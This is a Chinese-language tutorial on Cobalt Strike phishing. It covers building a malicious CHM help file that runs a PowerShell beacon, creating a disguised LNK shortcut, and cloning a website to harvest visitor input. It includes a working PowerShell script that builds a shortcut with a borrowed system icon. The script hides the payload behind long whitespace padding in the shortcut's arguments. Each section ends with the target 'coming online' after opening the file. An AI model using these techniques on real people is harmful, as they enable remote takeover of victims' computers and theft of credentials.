cobaltstrike--CHM、LNK钓鱼&网站钓鱼

1.CHM钓鱼

1）制作CHM

创建一个文件夹（名字随意），在文件夹里面再创建两个文件夹（名字随意）和一个index.html文件

 将下列代码复制到文件夹中的index.html中

command exec 

打开EasyCHM

 编译完成后，会生成一个CHM文件，一旦点击就会弹出计算器

2）生成钓鱼文件

 建立一个监听

 生成恶意powershell

 

 将生成的内容代替index.html中的calc.exe，并且一些单双引号也需修改

command exec 

 3）再次生成CHM文件，发送至目标，运行

发现目标上线

 2.LNK钓鱼

1）做个简单的powershell生产图标

 创建个txt文本写入下面代码然后改文件后缀名为.ps1

cmd /c calc.exe

右键，powershell运行后会弹出计算器

 2）生成钓鱼文件

 建立一个监听

 生成恶意powershell

 

新建一个1.txt，写入如下

cmd /c 生成的代码

将下面的powershell代码写入1234.ps1文件，右键运行powershell

$file = Get-Content "1.txt"
$WshShell = New-Object -comObject WScript.Shell
$Shortcut = $WshShell.CreateShortcut("test.lnk")
$Shortcut.TargetPath = "%SystemRoot%\system32\cmd.exe"
$Shortcut.IconLocation = "%SystemRoot%\System32\Shell32.dll,21"
$Shortcut.Arguments = '                                                                                                                                                                                                                                    '+ $file
$Shortcut.Save()

 生成test.lnk文件，而且图标改了（powershell执行文件要和1.txt要在一个目录下）

 3）发送至目标，运行

 发现目标上线

3.网站克隆

 1）克隆网站

 

 2)访问克隆后的网站

 

 3）查看访问者输入内容